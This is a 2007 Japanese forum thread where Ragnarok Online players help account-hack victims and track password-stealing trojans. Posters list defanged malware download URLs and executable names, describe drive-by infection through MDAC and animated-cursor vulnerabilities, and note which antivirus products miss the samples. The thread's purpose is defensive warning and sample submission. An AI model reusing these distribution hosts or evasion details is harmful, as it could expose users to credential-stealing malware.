まず確認するが、もってる垢はその被害にあった1つだけ?
もし複数垢もってるなら、感染してる状態で他の垢の生存確認は「してはいけない」。

安全な環境からパスを変更して、それからウィルスの駆除して、それで初めて
ログインして状況を確認。
もし感染に気付かず今初めてハク喰らったのなら、無事だったかもしれない
他の垢が、ログインしたために被害に遭う恐れがある。
(既に被害に遭ってる場合、確認しても手遅れのため、ログインは意味がない)

もし1つしかない垢で被害に遭ってしまったのなら、今から出来ることは
ウィルス駆除しつつ、癌に問い合わせて対応してくれるのを待つだけ。
時間は掛かるかも知れないが、対応してくれたという人もいる。

それとショックが大きいのは判るが、>1-6を読んで、テンプレ埋めて欲しい。

288 名前:270:07/05/11 03:53 ID:UgKQjmpz0
返信送れて失礼。ここのとこ帰宅遅すぎてもうだめぽorz
というのはともかく、レス下さった方ありがとう。
とりあえず暇見てメール送っておきます。

>>273
メアドまでありがとう。最後の行は2件目のほうのヤツなのかね。何故複数・・・?

>>277
それは予想外だった。怖くて踏んでなかったんですがそんなこともあるんですね・・・気をつけないと。

289 名前:(^ー^*)ノ〜さん:07/05/11 05:14 ID:LqQVyhEO0
少々お聞きしたいのですがレスを見る限り単純にOSリカバ再インストールで
垢ハク問題解消って事でもよいのでしょうか?

290 名前:278:07/05/11 05:22 ID:yYm9j/Wj0
【気付いた日時】2007 05 10 22時ほど
【不審なアドレスのクリックの有無】ちょっと覚えていません
【他人にID/Passを教えた事の有無】No
【他人が貴方のPCを使う可能性の有無】No
【ツールの使用の有無】No
【ネットカフェの利用の有無】No
【OS】Microsoft Windows XP Professional, Service Pack 3
【使用ブラウザ 】Lunascape4.13
【WindowsUpdateの有無】自動更新をしていました
【アンチウイルスソフト】NortonInternetSecurity2007
【その他のSecurty対策 】
ROアカウントハック対策スレのまとめサイト
2007年5月7日(月)危険サイト ドメインリストをhostsファイルで127.0.0.1設定
【 ウイルススキャン結果】
kasperskyオンラインスキャンにてTrojan-PSW.Win32.Maran.eiに感染

C:\WINDOWS\svchost.exe
C:\WINDOWS\system32\tj9viewer.dll
【スレログやテンプレを読んだか】
先ほど見てきましたが、再度落ち着いて…
【hosts変更】
ROアカウントハック対策スレのまとめサイト参照
2007年5月7日 (月) 読み込み専用にしていました。
【PeerGuardian2導入】
無(現在は、リネU対策サイトを参考にして導入しました)
【説明】
放置露店していてサバキャンしていたので、再度ログインしたところ
別の場所に移動されて、装備、z、倉庫等全部ない。他のアカウントも同様でした。

Webヘルプデスクに投稿、Gパス、キャラパス変更済み

291 名前:(^ー^*)ノ〜さん:07/05/11 05:45 ID:VmWxqQT70
>>290
OK。1個ずつ確認していこう。

まず、ウイルスとして検出された2つのファイルの作成日時はいつになってる?
C:\WINDOWS\svchost.exe
C:\WINDOWS\system32\tj9viewer.dll

次にOSのバージョンを再確認。
Windows XP SP3は2008年前半にリリース予定だそうですが、現在は存在しません。
以下のいずれかの方法でService Packいくつなのか確認しよう。
・マイコンピュータのプロパティ
・[スタート]-[ファイル名を指定して実行]でwinverを起動

292 名前:(^ー^*)ノ〜さん:07/05/11 06:27 ID:VmWxqQT70
>>290
質問攻めになってすまない。

今月発表された脆弱性(MS07-027)が利用された可能性もあるから、
確認しておきたいけど、Windows Updateが最後に行われたのはいつかな?

確認方法だけど、まずWindows Updateのサイトに繋いでもらって、
左側のメニューから、更新履歴の表示をクリック。
「製品」欄がWindows XPになってるもののうち、
一番上に表示されてるものの日付と更新プログラムを教えて欲しい。

あとついでにLunaScapeのブラウザエンジンは何を使ってたかな?
左下にIEのアイコン(青色のe)が表示されてたらIEだし、
緑色の変なアイコンならGeckoだと思うけど。

293 名前:(^ー^*)ノ〜さん:07/05/11 09:11 ID:Tzjpfs7z0
WindowsUpdateもhosts更新も、被害に遭ってからではなく事前に導入していたんだよな?
Maran系は頻繁に更新されてるけど、eiは遅くてもこのGWあたりに報告が上がってる。

現状知られている手法はMDACとaniカーソルの脆弱性を突いてDLさせるタイプで
4月に先行して配布されたWindowsUpdateをしていれば感染はしないはず。
それが抜けられてるとなると新型のダウンローダーが出回ってるのか、それとも
以前に踏んで抜かれていたのが、今になって中華が行動に出たのか……

294 名前:278:07/05/11 10:33 ID:yYm9j/Wj0
XPRroSP2です。(ずっと前に入れていた2kSP3と混同…お恥ずかしい書込みをしてしまいました。

ファイルの作成日は1617年12月12日、6:52:33と出ていました。

ブラウザエンジンはIEのものです。

更新のたぐいは2月の頃から導入していました。

295 名前:(^ー^*)ノ〜さん:07/05/11 10:53 ID:Tzjpfs7z0
>294
出来れば>292が書いてるWindowsUpdateの日付を確認してもらえないかな。
話を聞く限り、新しい脆弱性をつくタイプに引っかかってしまった気がする。

それとtj9viewer.dll でググったら、韓国のMyV3というアンチウィルスのページが引っかかった。
報告日(対応日?)が5/9らしい。
日本でも販売してるようだが評判を聞いた事が無いので、対応が速いのか遅いのかは不明。

296 名前:(^ー^*)ノ〜さん:07/05/11 11:43 ID:Sw6Q9KSM0
>>294
そのPCで友人や家族の誰かが踏んだ可能性は?
あと「ActiveXコントロールを実行しますか?」などとIEに聞かれていて
自分の意思で踏んだのならパッチも無駄なんだけど。

>>295
V3はアンラボかと思われ。韓国最大手のアンチウイルスメーカ。

297 名前:291,292:07/05/11 12:01 ID:VmWxqQT70
>>294
ファイルのタイムスタンプはうまくいけば、罠を踏んだ時間が分かるかと思ったけど、甘かったか。
踏んだ時間が分かれば、ブラウザのキャッシュ調べて、どこのサイト見に行ったときか分かるかなとか思ったけど・・・

自動更新機能をONにしてても、エラーが発生してインストールが失敗することもあるから、要注意。
その辺も、Windows Updateのサイトで更新履歴を見れば分かるから、確認してみよう。

あと、あれか。自動更新って、確かデフォルトでは毎日午前3時指定になってるはずだから、
その時間にPCがOFFになってれば更新されないわけだ。今月のパッチが5/9リリースだから、
罠踏んだのが5/10だとすると、まだ更新されてなかった可能性も高いなあ。

298 名前:(^ー^*)ノ〜さん:07/05/11 13:16 ID:Sw6Q9KSM0
tj7viewer.dllとかでググると結構引っかかるねぇ。

299 名前:278:07/05/11 20:07 ID:yYm9j/Wj0
細かく指示して頂けて幸いです。確認しましたところ

・2007 05 10
・Internet Explorer for Windows XP Service Pack 2 用
 セキュリティ更新プログラム (KB931768)

となっていました

300 名前:(^ー^*)ノ〜さん:07/05/11 21:01 ID:VmWxqQT70
>>299
最近パッチが当たってるね。5/10か・・・罠を踏んだ前なのか後なのか・・・
あとはIEのキャッシュを調べるぐらいかなあ。

IEのメニューから[ツール]-[インターネットオプション]-[全般]-[設定]-[ファイルの表示]
またはLunascapeで[ツール]-[Internet Explorerの設定]-[全般]-[設定]-[ファイルの表示]
どちらでも同じフォルダが開くはず。

最終アクセス日時でソートをかけて、5/9〜5/10あたりに
怪しいアドレスへのアクセスがないか調べてみてはどうだろうか。
危険URLは>>2のまとめサイトやリネージュ資料室に載ってるから、それと照らし合わせて。

一般的なウイルスだとWEBサイトの訪問は感染経路の1つに過ぎず、
他にもメールの添付ファイルを開くとか、
ダウンロードしたファイル(フリーソフトなど)を実行するとか、
いろいろあるんだけどね。アカハックウイルスに関しては、
WEBサイトの訪問以外の感染例は聞いたことはないけど、ないとは言い切れないしなあ。
(ネカフェの場合は、トロイをUSBメモリで直接仕込むとかいう例が過去スレで挙がってたけど)

301 名前:(^ー^*)ノ〜さん:07/05/11 21:24 ID:VmWxqQT70
もし、これから警察に届けを出すつもりがあるのであれば、
カスペが検出したファイル2個は駆除する前に暗号化ZIPなどで圧縮して、
証拠として保存しておいた方が良いかもしれない。
(暗号化しておかないと、今使ってるアンチウイルスソフトの
 パターンが更新されたときに勝手に駆除してしまうかもしれないので注意)

302 名前:(^ー^*)ノ〜さん:07/05/12 15:16 ID:e1UV00/z0
Blogに張られてたので報告。

またまた新武器です
+9クワドロプルハードヒットバリアスジュル(+9QHhVJ)
対不死十七cを四枚挿したバリアスジュルです。
スリーパー飽きたら騎士団ソロしてるのですよ。
以前+8DHhKを作ったけど、騎士団1Fだと+9DAKとscが被ってやりづらかったのと、
より特化するために今回作り直したのです
勿論、騎士団の不死と言えばカーリッツバーグ。
以下計算結果。頑張って載せよう(→詳細日記の更新 訪問を歓迎します

ttp://www◆conecojp◆net/online/



それと、最近管理人の名前を騙ってのアカハコ誘導書き込みが多々見られます。
もう何でもありって感じで怖いですね。

303 名前:sage:07/05/12 17:23 ID:HXFO6zRk0
情報不足は重々承知ですが、ご返答いただければ幸いです。
知人が、今年の三月ごろのメールを開き、URLをクリックしたところ中国語のサイトにとんでしまったらしいのです。
メールの内容はROに関係するものらしいのですが、あわてて消してしまったため詳細は不明です。
ブラウザの履歴から考えて、

http:すらっしゅすらっしゅwwww■wikiwiKi-game■comすらっしゅ8651262

らしいのです。
調べてみたところ、リネ関連のウイルス系らしいのですが、ROにも影響があるものでしょうか。
もし何か情報があれば、よろしくお願いします。

304 名前:(^ー^*)ノ〜さん:07/05/12 17:26 ID:HXFO6zRk0
あああ、sageるところを間違った…
ご容赦を。

305 名前:(^ー^*)ノ〜さん:07/05/12 17:31 ID:wYvaWV4E0
>303
「恐らく」ある。

最近ROの垢ハクに使われるトロイはROやリネ、メイプルといった複数の
ネトゲのパスを抜くタイプと言われている。
ただしトロイは次々に進化してるので、踏んだ時点でのトロイの現物を
拾わない限りは確認のしようが無い。

踏んだのが3月として今も被害に遭ってないのなら、WU等で感染が防げたのか
単にトロイのDLに時間が掛かってDL完了してなかったのか、それとも泳がされてる
だけなのか、それは不明。

テンプレとか読ませてチェックと対策を行った方が無難。

306 名前:(^ー^*)ノ〜さん:07/05/12 17:36 ID:HXFO6zRk0
>305
踏んだのはつい先ほどのことで、まだ挙動は不明です。
nod32でのスキャンでは問題なしとのことでした。
今はカスペを使ってスキャンをしています。
チェックと対策は進言しておきます。
どうもありがとうございました。

307 名前:(^ー^*)ノ〜さん:07/05/12 17:57 ID:wYvaWV4E0
>306
チェックするに越したことはないが、ソースチェッカーで見る限り今は404で
ページが無い模様。
中国語版のIISのメッセージが出たっぽい。

ただそのアドレスは結構前に危険アドレスとして報告のあったところなので
未対策のままじゃ、やっぱり危ない。
対策必須。

308 名前:(^ー^*)ノ〜さん:07/05/12 17:58 ID:o1yl4yxo0
>>303
wwww.(以下略)ではなく、wwwだよね?
ソースチェッカーで調べたところ

●「2007/05/09 16:46」のキャッシュ
MDAC脆弱性利用のVBScriptにより次のファイルをダウンロードする
http://www■slower-qth■com/8651262/svch■exe

●「2007/05/12 17:50」のキャッシュ
HTTP/1.1 404 Not Found

現在は404ということで、ファイルは削除されてるけど、
少なくとも3日前には罠が配置されてたようです。

なお404の場合でも、中国語で404用のページが表示されます。
それ自体は一見したところ罠はないけれど。

309 名前:278:07/05/12 20:04 ID:oKrtnNJ60
キャッシュを一生懸命見ているところです。

すでに削除してしまっているのですが、
Kasperskyのデータファイルにバックアップと言う部分がありまして
其処には残っている模様。これは証拠としては不十分でしょうか…?

310 名前:(^ー^*)ノ〜さん:07/05/12 23:48 ID:b1wyw6L00
それは警察が判断すること。

311 名前:(^ー^*)ノ〜さん:07/05/13 00:14 ID:+M+KRhBF0
>>309
捜査の手がかりになりそうなものは片っ端から保存しておいた方が良いと思うよ。
・カスペのログ
・ウイルス検体(隔離された状態などで残っているなら)
・事件前後に自分がROに繋いだ時間
・盗まれたアイテムおよびゼニーの詳細(>>104参照)

などなど思いつくものがあったら全部。そして、あとは警察の判断に任せよう。

312 名前:(^ー^*)ノ〜さん :07/05/13 01:53 ID:QgjVdrWO0
fc2ブログ狙い撃ちされてる?

------------------------------------------------
のパッチ内容について 投稿者:風祭Ragnarok Online 投稿日:2007/05/13(Sun) 00:27 No.47

■「春だ!祭だ!アマツにいこう?〜アマツ春興薫風祭〜」を終了いたしました。
■アイテム「魔法のやかん」のオートスペルでデリュージが発動した際、
 イエロージェムストーンを必要としないよう修正いたしました。
■アイテム「ひよこちゃん」「風車のかんざし」「避暑地の帽子」が特定条件下において、
 グラフィックに異常が発生する不具合を修正いたしました。
■アイテム「ペコペコのヘアバンド」装備時のグラフィックを変更いたしました。
 ※詳細:http://crnde■blog87■fc2■com/
----------------------------------------------

313 名前:(^ー^*)ノ〜さん :07/05/13 01:54 ID:QgjVdrWO0
2件目

----------------------------------------------------------------
ハイパースレッドになる 投稿者:あ桜の雪う影 投稿日:2007/05/13(Sun) 00:28 No.48

ハイパースレッドになる! かも
【いよいよ本格始動? パイストーリー】
3D酔いを克服(というか進行方向にカメラ固定なら酔わないだけ)した
わたしですが、やっぱり2Dの低頭身キャラが好きでして…。

ROのようなキャラ2Dで背景3Dなのが一番好みではありますが、
TWにもどっぷりのめり込めた体験からすると、背景2Dでも問題なさ気。

そんな中、しばらく前から気になっていたタイトルが、
ついに今月末、本格始動するようですね、それが「パイストーリー」です。
公式サイト http://bqdr■blog98■fc2■com/

-このあと非常に長いので中略させていただきます。

【web拍手】
> いつもROBBSなどの更新ありがとうございます
> ひよこの動きこんな感じです(心配でしたらソースチェッカーオンラインなどで確認を)
> ではまたっ(*'ヮ')?
わーお、ありがとうございます。
ふむふむ、なから合ってますね、よかったv
…え、「なから」って何、って…? これって方言なのかしら…、なから。
(なから=だいたいという意味です、ローカルなのかー!?) http://bqdr■blog98■fc2■com/
---------------------------------------------------

2件目はひじょーにコメントが長かった為に省略させていただきました。
で、チェッカーでみるとインフレームがあったけど、
キャッシュ削除して最新状態にしたらなくなってました。
検体とれなかったorz

314 名前:(^ー^*)ノ〜さん :07/05/13 02:02 ID:QgjVdrWO0
3匹目はfc2ブログじゃないけど、連続であったのでついでに。
こちらは既知のドメイン

----------------------------------------------------------
ココで特集やっててイベントの様子 投稿者:ダメット 投稿日:2007/05/13(Sun) 01:27 No.49

ココで特集やっててイベントの様子
なんかを動画でみれますよ!
プレゼントもあるもたいです!

HPのとこにhttp://www■jpxpie6-7net■com
----------------------------------------------------------

3匹連続書き込み・・・・;;
中華ウザ過ぎです

315 名前:(^ー^*)ノ〜さん:07/05/13 08:16 ID:E1NrDXNP0
>>312-314
中華の記事は他所のパクリだから記事文面の引用は2、3行で良いんじゃないかと。

316 名前:(^ー^*)ノ〜さん:07/05/13 08:18 ID:VJkcAFxL0
>>312-313
www■gameurdr■com/a2gua/a21.exe
今朝6時(!)更新。

>>314
www■jpxpie6-7net■com/svchost.exe
一昨日の朝8時更新。

そのうち拾ってみるけど、サイズからするとよくあるUpackのMaranだねぇ。

317 名前:(^ー^*)ノ〜さん:07/05/13 09:04 ID:E1NrDXNP0
www■gameurdr■com/a2gua/a21■exe

8時55分頃VIRUSTOTALで調べて見たが何故かNOD32が検知していなかった。
他はおおむね検知していたが。

318 名前:(^ー^*)ノ〜さん:07/05/13 10:11 ID:VJkcAFxL0
eset、最近シグネチャ作るのをサボってる気がするなぁ。
いやヒューリスティックは優秀なんだが、いざ見逃して
検体を送った後の対応が遅いというかシカトされてるというか
(zipのパスはinfectedでいいんだよな?)。
そのうちAntiVirあたりに抜かれる予感。

319 名前:(^ー^*)ノ〜さん:07/05/13 11:20 ID:+M+KRhBF0
検体取得用のバッチファイル作ってたときに、たまたま発見したものだけど、
>>241のexeが2日前ぐらいに差し替えられてて、PECompact圧縮であることは変わらないんだけど、
VIRUSTOTALで半分ぐらいはスルーします。自分の使ってるバスターでもスルーするので、
TrendMicroには検体送っときます。他社に送りたい人はよろしく。
www■gamanir■com/2007mmm■exe

320 名前:(^ー^*)ノ〜さん:07/05/13 11:21 ID:rbPQ9bdh0
>>317
入手してみたが、NOD32が確かに反応しないな。ちょっと検体送ってくるわ。

a21.exe
圧縮形式 : Upack 2.4 - 2.9 beta -> Dwing
Kaspersky : Trojan-PSW.Win32.Maran.ei
NOD32 : 現時点ではすりぬけ

321 名前:(^ー^*)ノ〜さん:07/05/13 11:37 ID:rbPQ9bdh0
>>319
NOD32では、Maranの亜種と検知して自動提出された。

322 名前:(^ー^*)ノ〜さん:07/05/13 15:37 ID:GCn60lwd0
最近検索をかけた時の大手情報サイトのWikipediaが見られないので
ふと思い当たり、タスクバーの
PeerGuardian2の「HTTPのブロック」のチェックを外してみて
グーグルで出たWikipediaの検索結果にアクセスしてみた…ら…
ちょろっと二項目ほど見ただけでも
ログにkorea、korea、koreaと一杯に埋まって…
恐ろしくて直ぐブロックして、もう一度アクセスしてみたら
読み込みできない状態に戻りました。

コレってWikipediaの全体に
アカウントハックが仕込まれているって事なのでしょうか?

323 名前:(^ー^*)ノ〜さん:07/05/13 15:40 ID:DFNs5OAr0
韓国のIP全てがアカハックだとでも言うのかお前は。

324 名前:322:07/05/13 16:09 ID:GCn60lwd0
>323
雑談なネタですみません。
PG2でなぜ三つの国のIPを弾く設定を入れているのは理解していますが
Wikipediaの記事の内容がどうして韓国IPを読みにいく動作をするのかさっぱり判らないんです。
勉強不足ですみません。

325 名前:(^ー^*)ノ〜さん:07/05/13 16:13 ID:FMK2+QL00
>322はPG2の動作原理を理解する事と、設定を見直す事を勧める。
何事もそうだが、理解せずに使うのは危険すぎる。

答えを言うなら、PG2使うの止めるか、中韓台リストを外すか、例外設定するか。
好きなのをどうぞ。

326 名前:(^ー^*)ノ〜さん:07/05/13 16:18 ID:hhutPhLT0
>>322
ROがどこのゲームかご存知で?

327 名前:(^ー^*)ノ〜さん:07/05/13 16:19 ID:yBdJKvSh0
>>326
いやRO関係のwikiじゃなくて、ってことだから
それはあんまりだ

328 名前:(^ー^*)ノ〜さん:07/05/13 16:20 ID:IINNooTi0
もう触るなよ

329 名前:(^ー^*)ノ〜さん:07/05/13 16:30 ID:FMK2+QL00
>Wikipediaの記事の内容がどうして韓国IPを読みにいく動作をするのかさっぱり判らないんです。
Wikipediaって韓国にあるんだし、そりゃ当たり前。

ja.wikipedia.orgをNslookupで見るとIPアドレスは211.115.107.162と返ってくる。
これをwhoisで見ると
inetnum: 211.104.0.0 - 211.119.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
(以下略)


知らずに使うから、そうなる。
中韓台リストを外すか、絶対安全と信じて例外指定するか、スパっとPG2使うのをやめるか
好きなのをどうぞ。

330 名前:(^ー^*)ノ〜さん:07/05/13 17:13 ID:BmcFh5rU0
まぁwikipediaが韓国にあったなんて普通知らないよな。常識的に考えて。

理由も言わずに簡単にPG2使うのやめろと連呼するのは
垢ハック業者の新戦法かもしれない。

331 名前:(^ー^*)ノ〜さん:07/05/13 17:23 ID:4QLPWf4b0
正しくは日本のwikipediaの鯖が韓国にアル

332 名前:312-313:07/05/13 17:32 ID:eEIxCxv70
私が確認した後にまた仕込みにいってたのかー。
検査ありがとうございます。
検体提出おつかれさまです。

ソースやイメージ画像を見たところ普通のブログだったし(ブログ管理人の名前が日本語不自由状態だけど) 
しかも放置してるブログぽくないから、既存を丸写しなのかねー。

333 名前:322:07/05/13 17:40 ID:GCn60lwd0
>325 >329-331
なるほど…Wikipediaが韓国にあるとは全く露知らず。
日本語版と銘打たれているので日本にあるものとばかり思い込んでいました。
今まで知らずにウィキペディアを使っていたんですね。
ROについての記事を上記サイトで見ようとしたら反応したので、てっきり何か仕込まれているものだとばかり…。
本当に無知で申し訳ない。丁寧に解説してもらえて助かりました。

>326-328
RO外の話ですみません。動転してこのスレッドの善意に頼ってしまいました。

334 名前:(^ー^*)ノ〜さん:07/05/13 19:26 ID:rbPQ9bdh0
>>333
まぁ、次からはLiveRO使おうぜと。

335 名前:(^ー^*)ノ〜さん:07/05/13 21:51 ID:FMK2+QL00
>333
言い方がキツかったかもしれんが、PG2を使う場合には注意点がある。
中韓台リストを入れてる場合、当然ながら中国・韓国・台湾の全てのサイトをブロックする。

これが何を意味するかと言えば、普通のサイトもブロックされる、という事。
例えばマザボメーカーのサイトは台湾が多いが、そこもブロックされるため
Biosの更新やらDriverのダウンロードが出来ない。
またROに限ればラグナゲートの情報が未実装スレに貼られたとしても、当然見れない。

他にもP2Pリストを突っ込んだら各社メーカーサイトが見れないやら、トラブルが起きる。

ブロックする範囲が広いために起きる事だが、見れないからと無条件で許可する癖が
付いてしまうのも問題があるわけで。

閲覧に支障が出ないレベルで使うなら、まとめサイトとリネ資料室の危険アドレスだけを
突っ込んでた方が無難。
判らないなら中韓台リストを使うな、というのはそういう意味。

336 名前:(^ー^*)ノ〜さん:07/05/14 09:30 ID:50j0c7dM0
>>319 深夜に更新。PEC2(PECompact2)からUpackに変更。

337 名前:(^ー^*)ノ〜さん:07/05/14 09:45 ID:hMRjVW1V0
>>336
NOD32で検出。やっぱり亜種で自動提出になった。正式なパターンでは対応してないが検知可能。

338 名前:(^ー^*)ノ〜さん:07/05/14 09:50 ID:hMRjVW1V0
追記:
カスペオンラインスキャナにかけたら、検知しなかった。ちょっと検体提出行って来る。

Upack 0.3.9 beta2s -> Dwing ということで、Upackのバージョン替えたものの模様。

しかし、よく気付くな…更新されてるのを。

339 名前:(^ー^*)ノ〜さん:07/05/14 10:59 ID:hMRjVW1V0
>>338
カスペから返答。次回updateで対応予定。
(現時点のオンラインスキャンでは検知できないが暫く後で対応すると思われ)

2007mmm.exe_ - Trojan-PSW.Win32.Maran.ev

340 名前:(^ー^*)ノ〜さん:07/05/14 11:36 ID:DUXoY9Dx0
アプリコットカフェの殴りプリスレに貼られていたもの
----------------------------------------------------
>154 名前:マフラー猫 Mail: 投稿日:2007/05/13(日) 16:52:20 [ pk6iiGsQ ]
>
>オリジナルアートエンブレム素材を扱っております
>各テーマごとにわかれていて一括ダウンロードできます
>370種以上のエンブレムがあり、加工は自由ですv
>幻想綺麗・透明、蒼や翠、空・森などの自然系から鮮やかに彩る世界 ダーク系植物苔系追加しました
>ttp://www■grandchasse■com/wikblog
----------------------------------------------------

リネージュ資料室さんの所にはあったけど、このスレでは初出と思われ。
ソースチェッカーでパッと見たところ、いつものようにaniカーソルとMDACの
脆弱性を利用したものと思われる。
www■maplestorfy■comに飛ばされてるが、そこにあるbodg■htmが行頭に「Rar!」と
入ってるのがよく判らない。
(無圧縮rarファイルに偽装?)

殴りプリスレでは直後から警告レスが付いてたので被害はないと思われ。

341 名前:(^ー^*)ノ〜さん:07/05/14 11:45 ID:50j0c7dM0
>>338
WWWCやWWWDが便利なんだぜ。
無ければHTTPヘッダ拾うスクリプト書いてもいいけど
(リネージュ資料室のウィルス更新状況CGIみたいなやつ)。

Upackは1月には3.9Finalになっている(3.99もある)。
UPXみたいにPEヘッダにバージョンを書くわけじゃないので
PEiD等での識別の細かい部分は参考程度で。

342 名前:(^ー^*)ノ〜さん:07/05/14 12:02 ID:50j0c7dM0
>>340
www■maplestorfy■com/lunimkabuges/zhixiaogui.exe
Rar!は特に意味はないものと思われる。
MDACのActiveXオブジェクトをtryしてだめならaniでcatchと
window.onloadイベントでIEのソース表示を阻止するのが
最近の福建ドメイン乱立Maran部隊のスタンダードになってる気がするなぁ。

343 名前:(^ー^*)ノ〜さん:07/05/14 17:51 ID:b5l0B+1+0
www■maplestorfy■com/lunimkabuges/zhixiaogui■exe
17時45分にVIRUSTOTALで調べるとこれまたNOD32で検知しない。
他の主要なものはおおむね検知している。
NOD32はこの手のには弱いのだろうか。

344 名前:(^ー^*)ノ〜さん:07/05/14 17:53 ID:Dh51xGxS0
NOD32はトロイに弱いと聞くが、こういうの見るとそう思えてくるな

345 名前:(^ー^*)ノ〜さん:07/05/14 18:09 ID:9Q8eeLsW0
www■toriningena■net/news/100658432/

blogの書き込みからURLだけ転載。
ソースチェッカーにかけた感じ、VBScriptでsvch.exeを落とそうとしてるのかな?

346 名前:(^ー^*)ノ〜さん:07/05/14 18:13 ID:9Q8eeLsW0
ってリスト見たら既出のURLでしたね、失礼しました。

347 名前:(^ー^*)ノ〜さん:07/05/14 18:49 ID:hMRjVW1V0
>>343
報告サンクス。検体提出いってくらぁ。

348 名前:(^ー^*)ノ〜さん:07/05/14 19:14 ID:Pg1/dds00
>>345
MDAC脆弱性利用で以下のトロイを落として実行する。
www■aehatena-jp■com/news/100658432/svch■exe

ほとんどのアンチウイルスソフトで検出できるけど、
またまたNOD32はすり抜けるみたい。

349 名前:(^ー^*)ノ〜さん:07/05/14 19:20 ID:6MlZw3HU0
NODどうしてしまったんだ

350 名前:(^ー^*)ノ〜さん:07/05/14 19:32 ID:92ul0Wz70
アカハクアドレス書込試行を捕捉したので報告。
投稿者は61.22.13.63(61-22-13-63.rev.home.ne.jp)。
UAがMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 1.1.4322)
で中国語設定。
投稿されたウイルスアドレスはhttp://www■din-or■com/bbs
home.ne.jpには通報済み。

TencentTravelerは既出だと思うが中国で流行るタブブラウザ。.htaccessで
弾いても良いかもしれない。IPに関しては深く調べてないが、ネカフェか踏み台か、
はたまた留学生か。

尚、>>161で報告した通報の返事は『該当と思われる弊社会員に対し注意喚起』したそうで。
ま、ODNだしねぇ…。

351 名前:(^ー^*)ノ〜さん:07/05/14 19:56 ID:hMRjVW1V0
>>348
ほい。NOD32に提出してきた。

352 名前:(^ー^*)ノ〜さん:07/05/14 20:06 ID:SEn4rdON0
いつもおつかれさまです

353 名前:(^ー^*)ノ〜さん:07/05/14 22:23 ID:b5l0B+1+0
>>270にあるODNホスト、日付が変わっても相変わらずリネージュ資料室のハエ取り紙にかかっている模様。
OFSfb-10p2-147.ppp11.odn.ad.jp

この事から常時接続環境である事は間違いない。
これはネカフェの可能性が高いね、次点で踏み台か。

ちなみに>>350のは福岡のCATV回線らしい、調べるとCATVのネカフェってのもあるみたいだねぇ。

ネカフェなら行った折にホスト名を自分で調べておけばある程度データベース化できるとは思う。
連中の協力者が何処から書きこんでいるのかも、ね。

2007/05/12 04:56:31 OFSfb-10p2-147.ppp11.odn.ad.jp
2007/05/12 08:16:37 OFSfb-10p2-147.ppp11.odn.ad.jp
2007/05/14 10:51:25 OFSfb-10p2-147.ppp11.odn.ad.jp

上の2つは明らかに中華と思われる文字を含むGoogleリファラ入り。
”Google 搜索&lr=lang_ja”

14日のは”ro ドメイン 掲示板”をGoogle検索している模様。

354 名前:(^ー^*)ノ〜さん:07/05/14 22:29 ID:XLqmEjQm0
そのホストは数年前からBBS荒らしとして使われてるよ

355 名前:(^ー^*)ノ〜さん:07/05/14 23:28 ID:b5l0B+1+0
>>354
なるほど、数年前からならほぼネカフェと見た。
そのホストをピンポイントで塞いでもよさそうな気もするな。
そのネカフェから書き込もうとしない限り問題が無いわけだ。

356 名前:(^ー^*)ノ〜さん:07/05/14 23:33 ID:b5l0B+1+0
毎度おなじみ福建人の新ドメインを発見。
取れたてほやほや。
なんちゃってライブドアは福建人に大人気の模様。

Domain Name ..................... rinku-livedoor■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-05-13 11:06:40

357 名前:(^ー^*)ノ〜さん:07/05/15 06:34 ID:xQdR6UXY0
>>356
既に稼動しておりました。
www■rinku-livedoor■com/ ↓
www■blogplaync■com/kin.htm ↓
www■blogplaync■com/chengzhi.exe
物はいつものUpackなMaran。更新は >>317 の8分前なので
ほぼ同時に作った物と思われ。

358 名前:(^ー^*)ノ〜さん:07/05/15 14:18 ID:8KLUeHFp0
>>357
Upack 2.4 - 2.9 beta -> Dwing

Kaspersky : Trojan-PSW.Win32.Maran.ei
NOD32検査すりぬけ

と言う訳で検体提出いってくるわ。

359 名前:(^ー^*)ノ〜さん:07/05/15 16:58 ID:QsaPhTQD0
今回は早めに気がついた。

あこすれてんぷら(本家)がまたハクアドレスの改ざんに。

しかも
>現在このサイトはリンクが1つも無い状態にしています。
>リンクは全てアカハックサイトへのリンクだと思ってください。
この警告文全体が www■din-or■com/bbs のリンクにされるというタチの悪さ。

アコプリスレからもリンクは外されてるので、テンプレサイトをチェックしてる人
以外はもう見てないと思うが、真面目にあそこはヤバすぎる……
ググるとトップに出るし、ラグナロク通りのリンクが生きてるから間違えて踏む人が
出かねない。
管理人多忙なのは仕方ないとして、なんとか良い手はないものかね……

360 名前:(^ー^*)ノ〜さん:07/05/15 17:55 ID:ofpPpLbc0
多忙なんじゃなくて、もうROに興味なくなり心の底からあのwikiはどうでもいいんだろう。
すでにwikiなんて記憶の中にも無いと思われる。

鯖はs78.xrea.comであっているのかな?
誰か通報してるだろうけど私からもしてみる。

361 名前:(^ー^*)ノ〜さん:07/05/15 19:05 ID:VbbqnzSq0
最悪だ・・・冤罪BANくらったorz
RMTなんかしてないっての!総資産7M程度だよ!てかこないだ転生して、やっと転職だと思ったのに!ヽ(`Д´)ノフザケンナ
ヘルプデスクに投稿しても癌崩は証拠があるから凍結解除できないとか頭悪いこと抜かすし。
その証拠が見せられないんだったら証拠なんて意味ないだろ。納得できるかよ!ヽ(`Д´)ノ

>>うちの弟が冤罪垢BANを食らいました.うちの弟はBOTは当然,
>>ツール類も使っていないのに,不正ツールの特徴が見られたためとしてBANされました.

>>弟に話を聞くと,実家のネットは回線が悪く,鯖缶の回数が異常に多いようです.
>>同様に鯖缶が多い弟の知り合いの中にもBANされた人が居る模様で,癌は単にログインの回数が多い人を不正ツールの特徴とみなしてBANしていると思われます.

>>弟が抗議したところ,解除されて,二日分(停止してた期間)のチケット補償がありました.
>>でも,回答内容が「この度は,不正ツール調査の為にご協力いただき誠にありがとうございました.
>>今後とも,不正ツール利用者,不正行為者の取締りの為,調査にご理解ご協力いただくことがあるかと存じますが,

>>その際には,何卒よろしくお願い申し上げます.」というものでした.
>>これって,冤罪BANがわかったので調査ということにしておきます,
>>チケット返すから文句ないでしょ?と言われてるような気がするんですけどキノセイでしょうか…

でもこういう例もあるみたいなので、最後までやってみるぞ!ヽ(`Д´)ノ

362 名前:(^ー^*)ノ〜さん:07/05/15 19:10 ID:sjjNBHWI0
